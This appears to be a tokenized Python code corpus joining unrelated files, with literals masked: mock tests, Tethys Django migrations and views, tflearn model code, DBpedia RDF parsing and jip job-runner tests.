) <EOL> def test_wrapped_patch_multiple ( self ) : <EOL> decorated = patch . multiple ( '<STR_LIT>' , modules = { } ) ( function ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_stopall_lifo ( self ) : <EOL> stopped = [ ] <EOL> class thing ( object ) : <EOL> one = two = three = None <EOL> def get_patch ( attribute ) : <EOL> class mypatch ( _patch ) : <EOL> def stop ( self ) : <EOL> stopped . append ( attribute ) <EOL> return super ( mypatch , self ) . 
stop ( ) <EOL> return mypatch ( lambda : thing , attribute , None , None , <EOL> False , None , None , None , { } ) <EOL> [ get_patch ( val ) . start ( ) for val in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> patch . stopall ( ) <EOL> self . assertEqual ( stopped , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_special_attrs ( self ) : <EOL> def foo ( x = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> return x <EOL> with patch . object ( foo , '<STR_LIT>' , ( <NUM_LIT:1> , ) ) : <EOL> self . assertEqual ( foo ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( foo ( ) , <NUM_LIT:0> ) <EOL> with patch . object ( foo , '<STR_LIT>' , "<STR_LIT>" ) : <EOL> self . assertEqual ( foo . __doc__ , "<STR_LIT>" ) <EOL> self . assertEqual ( foo . __doc__ , "<STR_LIT>" ) <EOL> with patch . object ( foo , '<STR_LIT>' , "<STR_LIT>" ) : <EOL> self . assertEqual ( foo . __module__ , "<STR_LIT>" ) <EOL> self . assertEqual ( foo . __module__ , __name__ ) <EOL> if hasattr ( self . test_special_attrs , '<STR_LIT>' ) : <EOL> with patch . object ( foo , '<STR_LIT>' , dict ( [ ( '<STR_LIT:s>' , <NUM_LIT:1> , ) ] ) ) : <EOL> self . assertEqual ( foo . __annotations__ , dict ( [ ( '<STR_LIT:s>' , <NUM_LIT:1> , ) ] ) ) <EOL> self . assertEqual ( foo . __annotations__ , dict ( ) ) <EOL> if hasattr ( self . test_special_attrs , '<STR_LIT>' ) : <EOL> foo = eval ( "<STR_LIT>" ) <EOL> with patch . object ( foo , '<STR_LIT>' , dict ( [ ( '<STR_LIT:x>' , <NUM_LIT:1> , ) ] ) ) : <EOL> self . assertEqual ( foo ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( foo ( ) , <NUM_LIT:0> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import tethys_compute . utilities <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = tethys_compute . utilities . DictionaryField ( default = b'<STR_LIT>' , blank = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = b'<STR_LIT>' , max_length = <NUM_LIT> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from . base import TethysGizmoOptions <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class ButtonGroup ( TethysGizmoOptions ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , buttons , vertical = False , attributes = '<STR_LIT>' , classes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> super ( ButtonGroup , self ) . __init__ ( attributes = attributes , classes = classes ) <EOL> self . buttons = buttons <EOL> self . vertical = vertical <EOL> class Button ( TethysGizmoOptions ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , display_text = '<STR_LIT>' , name = '<STR_LIT>' , style = '<STR_LIT>' , icon = '<STR_LIT>' , href = '<STR_LIT>' , <EOL> submit = False , disabled = False , attributes = { } , classes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> super ( Button , self ) . __init__ ( attributes = attributes , classes = classes ) <EOL> self . display_text = display_text <EOL> self . name = name <EOL> self . style = style <EOL> self . icon = icon <EOL> self . href = href <EOL> self . submit = submit <EOL> self . disabled = disabled </s>
<s> from django . http import JsonResponse <EOL> from django . template . loader import render_to_string <EOL> from tethys_compute . models import TethysJob <EOL> from tethys_gizmos . gizmo_options . jobs_table import JobsTable <EOL> def execute ( request , job_id ) : <EOL> try : <EOL> job = TethysJob . objects . filter ( id = job_id ) [ <NUM_LIT:0> ] . child <EOL> job . execute ( ) <EOL> success = True <EOL> message = '<STR_LIT>' <EOL> except Exception , e : <EOL> success = False <EOL> message = str ( e ) <EOL> return JsonResponse ( { '<STR_LIT:success>' : success , '<STR_LIT:message>' : message } ) <EOL> def delete ( request , job_id ) : <EOL> try : <EOL> job = TethysJob . objects . filter ( id = job_id ) [ <NUM_LIT:0> ] . child <EOL> job . delete ( ) <EOL> success = True <EOL> message = '<STR_LIT>' <EOL> except Exception , e : <EOL> success = True <EOL> message = str ( e ) <EOL> return JsonResponse ( { '<STR_LIT:success>' : success , '<STR_LIT:message>' : message } ) <EOL> def update_row ( request , job_id ) : <EOL> try : <EOL> data = { key : val for key , val in request . POST . iteritems ( ) } <EOL> filter_string = data . pop ( '<STR_LIT>' ) <EOL> filters = [ f . strip ( '<STR_LIT>' ) for f in filter_string . strip ( '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) ] <EOL> job = TethysJob . objects . filter ( id = job_id ) [ <NUM_LIT:0> ] . child <EOL> row = JobsTable . get_rows ( [ job ] , filters ) [ <NUM_LIT:0> ] <EOL> data . update ( { '<STR_LIT>' : job , '<STR_LIT>' : row } ) <EOL> if job . label == '<STR_LIT>' : <EOL> job . statuses = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:30> , '<STR_LIT>' : <NUM_LIT:5> } <EOL> success = True <EOL> status = job . 
status <EOL> html = render_to_string ( '<STR_LIT>' , data ) <EOL> except Exception , e : <EOL> print '<STR_LIT>' , e <EOL> success = False <EOL> status = None <EOL> html = None <EOL> return JsonResponse ( { '<STR_LIT:success>' : success , '<STR_LIT:status>' : status , '<STR_LIT:html>' : html } ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( unique = True , max_length = <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:200> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ( '<STR_LIT:username>' , models . CharField ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ( '<STR_LIT:password>' , models . CharField ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> import fudge <EOL> import urllib <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . utils . safestring import SafeData <EOL> from . . _utils import TestCase <EOL> from ... templatetags import text_helpers <EOL> def generate_random_request ( match = "<STR_LIT>" , <EOL> url_template = "<STR_LIT>" ) : <EOL> request = fudge . Fake ( ) <EOL> request . has_attr ( META = { "<STR_LIT>" : url_template % match } ) <EOL> fudge . clear_calls ( ) <EOL> return request <EOL> def generate_random_request_and_context ( text , match = "<STR_LIT>" , <EOL> url_template = "<STR_LIT>" ) : <EOL> request = generate_random_request ( match = match , url_template = url_template ) <EOL> context = { <EOL> "<STR_LIT>" : request , <EOL> "<STR_LIT:text>" : text , <EOL> } <EOL> return request , context <EOL> class HelloWorld ( TestCase ) : <EOL> def test_data_returns_is_marked_as_safe ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( text ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> self . assertIsInstance ( result , SafeData ) <EOL> def test_gracefully_returns_when_lacking_request_object ( self ) : <EOL> text = "<STR_LIT>" <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( { "<STR_LIT:text>" : text } ) <EOL> self . assertEqual ( text , result ) <EOL> def test_raises_exception_when_debug_is_on ( self ) : <EOL> settings = fudge . Fake ( ) <EOL> settings . has_attr ( DEBUG = True ) <EOL> text = "<STR_LIT>" <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> with fudge . patched_context ( text_helpers , '<STR_LIT>' , settings ) : <EOL> self . assertRaises ( ImproperlyConfigured , node . 
render , { "<STR_LIT:text>" : text } ) <EOL> def test_works_with_referrers_with_no_q_get_param ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( <EOL> "<STR_LIT>" , url_template = "<STR_LIT>" , match = "<STR_LIT>" ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( { "<STR_LIT:text>" : text } ) <EOL> self . assertEqual ( text , result ) <EOL> def test_replaces_words_with_highlighted_word ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( text ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_can_handle_mismatched_case ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( text ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_can_handle_mixed_case ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = "<STR_LIT:text>" ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_spaces_as_urlencoded_values ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . 
assertEqual ( expected , result ) <EOL> def test_matches_spaces_as_pluses ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_spaces ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_numbers ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_underscores ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_hyphens ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . 
assertEqual ( expected , result ) <EOL> def test_only_responds_to_a_subset_of_characters ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = urllib . quote ( "<STR_LIT>" ) <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> self . assertEqual ( text , result ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import tflearn <EOL> import tflearn . data_utils as du <EOL> from tflearn . datasets import cifar10 <EOL> ( X , Y ) , ( testX , testY ) = cifar10 . load_data ( ) <EOL> X , mean = du . featurewise_zero_center ( X ) <EOL> X , std = du . featurewise_std_normalization ( X ) <EOL> testX = du . featurewise_zero_center ( testX , mean ) <EOL> testX = du . featurewise_std_normalization ( testX , std ) <EOL> Y = du . to_categorical ( Y , <NUM_LIT:10> ) <EOL> testY = du . to_categorical ( testY , <NUM_LIT:10> ) <EOL> net = tflearn . input_data ( shape = [ None , <NUM_LIT:32> , <NUM_LIT:32> , <NUM_LIT:3> ] ) <EOL> net = tflearn . conv_2d ( net , <NUM_LIT:32> , <NUM_LIT:3> ) <EOL> net = tflearn . batch_normalization ( net ) <EOL> net = tflearn . activation ( net , '<STR_LIT:relu>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:4> , <NUM_LIT:32> , regularizer = '<STR_LIT>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:1> , <NUM_LIT:32> , downsample = True , <EOL> regularizer = '<STR_LIT>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:4> , <NUM_LIT:64> , regularizer = '<STR_LIT>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:1> , <NUM_LIT:64> , downsample = True , <EOL> regularizer = '<STR_LIT>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:5> , <NUM_LIT> , regularizer = '<STR_LIT>' ) <EOL> net = tflearn . global_avg_pool ( net ) <EOL> net = tflearn . fully_connected ( net , <NUM_LIT:10> , activation = '<STR_LIT>' ) <EOL> mom = tflearn . Momentum ( <NUM_LIT:0.1> , lr_decay = <NUM_LIT:0.1> , decay_step = <NUM_LIT> , staircase = True ) <EOL> net = tflearn . regression ( net , optimizer = mom , <EOL> loss = '<STR_LIT>' ) <EOL> model = tflearn . 
DNN ( net , checkpoint_path = '<STR_LIT>' , <EOL> max_checkpoints = <NUM_LIT:10> , tensorboard_verbose = <NUM_LIT:0> , <EOL> clip_gradients = <NUM_LIT:1.0> ) <EOL> model . fit ( X , Y , n_epoch = <NUM_LIT:200> , validation_set = ( testX , testY ) , <EOL> show_metric = True , batch_size = <NUM_LIT> , shuffle = True , <EOL> run_id = '<STR_LIT>' ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> import tensorflow as tf <EOL> from . . import losses <EOL> """<STR_LIT>""" <EOL> def add_weights_regularizer ( variable , loss = "<STR_LIT>" , weight_decay = <NUM_LIT> , <EOL> add_to_collection = None ) : <EOL> """<STR_LIT>""" <EOL> if not add_to_collection : <EOL> add_to_collection = tf . GraphKeys . REGULARIZATION_LOSSES <EOL> if isinstance ( loss , str ) : <EOL> regul = losses . get ( loss ) <EOL> weights_regularizer = regul ( variable , weight_decay ) <EOL> elif loss and callable ( loss ) : <EOL> weights_regularizer = loss ( variable ) <EOL> else : <EOL> weights_regularizer = loss <EOL> if add_to_collection : <EOL> tf . add_to_collection ( add_to_collection , weights_regularizer ) <EOL> return weights_regularizer <EOL> def add_activation_regularizer ( op , loss = "<STR_LIT>" , activ_decay = <NUM_LIT> , <EOL> add_to_collection = None ) : <EOL> raise NotImplementedError </s>
<s> import codecs <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> import bz2file <EOL> import gzip <EOL> import RDF <EOL> from utils . logger import get_logger <EOL> DBPEDIA_RES_URI = "<STR_LIT>" <EOL> logger = get_logger ( ) <EOL> def open_file ( file_path ) : <EOL> """<STR_LIT>""" <EOL> open_fn = codecs . open <EOL> if file_path . endswith ( "<STR_LIT>" ) : <EOL> open_fn = bz2file . open <EOL> elif file_path . endswith ( "<STR_LIT>" ) : <EOL> open_fn = gzip . open <EOL> return open_fn <EOL> def get_rdf_parser ( file_path ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT>" in file_path : <EOL> return RDF . TurtleParser ( ) <EOL> elif "<STR_LIT>" in file_path : <EOL> return RDF . NTriplesParser ( ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" , file_path ) <EOL> def iterate_rdf_triples ( file_path ) : <EOL> """<STR_LIT>""" <EOL> open_fn = open_file ( file_path ) <EOL> rdf_parser = get_rdf_parser ( file_path ) <EOL> with open_fn ( file_path , "<STR_LIT:r>" ) as in_file : <EOL> for rdf_line in in_file : <EOL> rdf_stream = rdf_parser . parse_string_as_stream ( rdf_line , "<STR_LIT:.>" ) <EOL> for statement in rdf_stream : <EOL> yield statement . subject , statement . predicate , statement . object <EOL> def tuple_generator ( file_path , prefix = None ) : <EOL> """<STR_LIT>""" <EOL> rdf_tuple_iterator = iterate_rdf_triples ( file_path ) <EOL> counter = <NUM_LIT:0> <EOL> for subj , _ , obj in rdf_tuple_iterator : <EOL> subj = unicode ( subj ) <EOL> obj = unicode ( obj ) <EOL> if prefix : <EOL> subj = subj . replace ( prefix , "<STR_LIT>" ) <EOL> obj = obj . replace ( prefix , "<STR_LIT>" ) <EOL> counter += <NUM_LIT:1> <EOL> if counter % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> logger . 
info ( "<STR_LIT>" , counter ) <EOL> yield subj , obj <EOL> def generate_subject_object_map ( file_path , prefix = None ) : <EOL> """<STR_LIT>""" <EOL> subj_obj_generator = tuple_generator ( file_path , prefix ) <EOL> return dict ( subj_obj_generator ) <EOL> def generate_title_id_map ( redirects_file_path , title_ids_file_path , output_file_path = None ) : <EOL> """<STR_LIT>""" <EOL> resolved_title_id_map = dict ( ) <EOL> redirects_map = generate_subject_object_map ( redirects_file_path , DBPEDIA_RES_URI ) <EOL> title_ids_map = generate_subject_object_map ( title_ids_file_path , DBPEDIA_RES_URI ) <EOL> counter = <NUM_LIT:0> <EOL> for title , page_id in title_ids_map . items ( ) : <EOL> title = redirects_map . get ( title , title ) <EOL> if title in title_ids_map : <EOL> page_id = title_ids_map [ title ] <EOL> else : <EOL> logger . warning ( "<STR_LIT>" , page_id ) <EOL> if title not in resolved_title_id_map : <EOL> resolved_title_id_map [ title ] = page_id <EOL> else : <EOL> logger . debug ( "<STR_LIT>" , title ) <EOL> counter += <NUM_LIT:1> <EOL> if counter % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" , counter ) <EOL> if output_file_path : <EOL> logger . info ( "<STR_LIT>" , output_file_path ) <EOL> with codecs . open ( output_file_path , "<STR_LIT:w>" ) as out_file : <EOL> pickle . dump ( resolved_title_id_map , out_file , pickle . HIGHEST_PROTOCOL ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return resolved_title_id_map </s>
<s> """<STR_LIT>""" <EOL> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = __doc__ , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from . import parse_args , dry , colorize , YELLOW , GREEN , RED , BLUE <EOL> import jip <EOL> import jip . jobs <EOL> from jip . logger import getLogger <EOL> from datetime import datetime , timedelta <EOL> log = getLogger ( '<STR_LIT>' ) <EOL> def main ( argv = None ) : <EOL> args = parse_args ( __doc__ , argv = argv ) <EOL> script_file = args [ "<STR_LIT>" ] <EOL> script_args = args [ "<STR_LIT>" ] <EOL> try : <EOL> script = jip . find ( script_file , is_pipeline = args [ '<STR_LIT>' ] ) <EOL> except LookupError , e : <EOL> print >> sys . stderr , str ( e ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args [ '<STR_LIT>' ] or args [ '<STR_LIT>' ] : <EOL> dry ( script , script_args , dry = args [ '<STR_LIT>' ] , show = args [ '<STR_LIT>' ] ) <EOL> return <EOL> keep = args [ '<STR_LIT>' ] <EOL> force = args [ '<STR_LIT>' ] <EOL> profiler = args [ '<STR_LIT>' ] <EOL> silent = not args [ '<STR_LIT>' ] <EOL> try : <EOL> profile = jip . profiles . Profile ( ) <EOL> if args [ '<STR_LIT>' ] : <EOL> spec_prof = jip . profiles . Profile . from_file ( args [ '<STR_LIT>' ] ) <EOL> spec_prof . update ( profile ) <EOL> profile = spec_prof <EOL> profile . load_args ( args ) <EOL> jobs = jip . jobs . create_jobs ( script , args = script_args , keep = keep , <EOL> profile = profile ) <EOL> for i , j in enumerate ( jobs ) : <EOL> j . id = i + <NUM_LIT:1> <EOL> for exe in jip . jobs . create_executions ( jobs ) : <EOL> if exe . completed and not force : <EOL> if not silent : <EOL> print >> sys . stderr , colorize ( "<STR_LIT>" , YELLOW ) , exe . name <EOL> else : <EOL> if not silent : <EOL> sys . stderr . write ( colorize ( "<STR_LIT>" , YELLOW ) + <EOL> "<STR_LIT>" . format ( <EOL> name = colorize ( exe . name , BLUE ) <EOL> ) ) <EOL> sys . stderr . flush ( ) <EOL> start = datetime . now ( ) <EOL> success = jip . jobs . run_job ( exe . job , profiler = profiler ) <EOL> end = timedelta ( seconds = ( datetime . now ( ) - start ) . 
seconds ) <EOL> if success : <EOL> if not silent : <EOL> print >> sys . stderr , colorize ( exe . job . state , GREEN ) , "<STR_LIT>" % ( end ) <EOL> else : <EOL> if not silent : <EOL> print >> sys . stderr , colorize ( exe . job . state , RED ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except jip . ValidationError as va : <EOL> sys . stderr . write ( str ( va ) ) <EOL> sys . stderr . write ( "<STR_LIT:\n>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except jip . ParserException as va : <EOL> sys . stderr . write ( str ( va ) ) <EOL> sys . stderr . write ( "<STR_LIT:\n>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except Exception as va : <EOL> raise <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from collections import namedtuple <EOL> import pytest <EOL> import os <EOL> import stat <EOL> import tempfile <EOL> import jip <EOL> import jip . cluster as cl <EOL> listOfBinaries = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> def createFakeBinaries ( ) : <EOL> fakeBinDir = tempfile . mkdtemp ( ) <EOL> paths = os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT::>' ) <EOL> paths . append ( fakeBinDir ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT::>' . join ( paths ) <EOL> for f in [ os . path . join ( fakeBinDir , f ) for f in listOfBinaries ] : <EOL> open ( f , '<STR_LIT:w>' ) . close ( ) <EOL> os . chmod ( f , stat . S_IRWXU ) <EOL> return fakeBinDir <EOL> def removeFakeBinaries ( fakeBinDir ) : <EOL> for f in [ os . path . join ( fakeBinDir , f ) for f in listOfBinaries ] : <EOL> os . unlink ( f ) <EOL> os . rmdir ( fakeBinDir ) <EOL> paths = os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT::>' ) <EOL> paths . remove ( fakeBinDir ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT::>' . join ( paths ) <EOL> @ pytest . mark . parametrize ( "<STR_LIT:name>" , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_loading_internal_implementations_with_no_bins ( name ) : <EOL> original_path = os . environ [ '<STR_LIT>' ] <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with pytest . raises ( cl . ExecutableNotFoundError ) : <EOL> cl . get ( name ) <EOL> os . environ [ '<STR_LIT>' ] = original_path <EOL> cl . _cluster_cache = { } <EOL> @ pytest . mark . parametrize ( "<STR_LIT:name>" , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_loading_internal_implementations ( name ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> assert cl . 
get ( name ) is not None <EOL> removeFakeBinaries ( fakeBinDir ) <EOL> def test_cluster_not_found ( ) : <EOL> with pytest . raises ( cl . ClusterImplementationError ) : <EOL> cl . get ( '<STR_LIT>' ) <EOL> def test_cluster_name_none ( ) : <EOL> jip . config . config [ '<STR_LIT>' ] = None <EOL> with pytest . raises ( cl . ClusterImplementationError ) : <EOL> cl . get ( None ) <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_resolving_log_file_names ( name , term ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> Job = namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> j = Job ( <NUM_LIT:1> ) <EOL> cluster = cl . get ( name ) <EOL> assert cluster . resolve_log ( j , "<STR_LIT>" % term ) == "<STR_LIT>" <EOL> removeFakeBinaries ( fakeBinDir ) <EOL> def test_sge_threads_pe_loading ( ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> jip . config . config [ '<STR_LIT>' ] = { <EOL> "<STR_LIT>" : '<STR_LIT>' <EOL> } <EOL> sge = cl . SGE ( ) <EOL> assert sge . threads_pe == '<STR_LIT>' <EOL> removeFakeBinaries ( fakeBinDir ) <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:g>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:k>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:M>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:m>' , '<STR_LIT>' ) <EOL> ] ) <EOL> def test_sge_mem_unit_loading ( unit , op ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> mem = <NUM_LIT> <EOL> jip . config . config [ '<STR_LIT>' ] = { <EOL> "<STR_LIT>" : unit <EOL> } <EOL> sge = cl . SGE ( ) <EOL> assert sge . mem_unit == unit . upper ( ) <EOL> assert sge . _sge_mem ( mem ) == ( '<STR_LIT>' % ( eval ( "<STR_LIT>" % ( mem , op ) ) , unit . 
upper ( ) ) ) <EOL> removeFakeBinaries ( fakeBinDir ) <EOL> def test_sge_mem_unit_default ( ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> mem = <NUM_LIT> <EOL> sge = cl . SGE ( ) <EOL> assert sge . mem_unit == '<STR_LIT:M>' <EOL> assert sge . _sge_mem ( mem ) == '<STR_LIT>' <EOL> removeFakeBinaries ( fakeBinDir ) </s>
